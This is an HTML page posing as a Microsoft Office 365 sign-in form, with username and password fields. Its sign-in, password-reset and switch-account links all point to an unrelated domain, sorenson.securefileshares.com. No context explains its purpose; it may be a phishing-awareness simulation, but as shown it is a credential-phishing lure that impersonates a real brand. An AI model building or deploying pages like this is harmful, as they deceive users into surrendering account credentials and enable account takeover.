<!DOCTYPE html>
<html lang="en-us">
    <head>
        <title>O365</title>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">       
        <meta name="author" content="Sorenson">
        <meta name="description" content="Sorenson">
        <style type="text/css">html {
            height: 100%;
        }

        body {
            background: #FFFFFF;
            min-height: 200px;
            position: relative;
            height: 100%;
            color: #000000;
            font-family: "Segoe UI", "Segoe", "SegoeUI-Regular-final", Tahoma, Helvetica, Arial, sans-serif;
        }
        main{
            margin: 0 auto;
        }
        .container {
            margin: 0 auto;
            max-width: 300px;
            max-height: 300px;
            height: 100vh;
            box-shadow: 0 5px 12px 0 rgba(0, 0, 0, 0.15);
            background: transparent;
            position: relative;
            z-index: 99;
            padding: 10px;
            text-align: left;
        }
        .button{
            background: #0076d6;
            border-radius: 0px;
            padding: .5rem 3rem;
            font-size: 1em;
            margin-top: 1rem;
            float: right;
            color: white;
            text-decoration: none;
        }
        label{
        font-weight: bold;
        font-size: 1.2em;
        }
        #email{
            margin-top: 2em;
        }
        a:visited{
          color: #0076d6;  
        }
        </style>
    </head>
<body>
<main>
<div class="container">
<div id="email">
        <label for="username"></label>
        <input type="text" id="username" name="username" required>
</div>   
<div id="password">
    <br>
        <label for="pass">Enter Password</label><br>
        <input type="password" id="pass" name="password"
               minlength="8" required>
    </div>
<div>
<br>
<br>
 <a href="http://sorenson.securefileshares.com/site/submit">Forgot my Password</a>
 <br>
 <a href="http://sorenson.securefileshares.com/site/submit">Sign in with another account</a>   
</div>
<br>  
<a href="http://sorenson.securefileshares.com/site/submit" class="button">Sign In</a>
</div>
</div>
</main>
</body>    
</html>
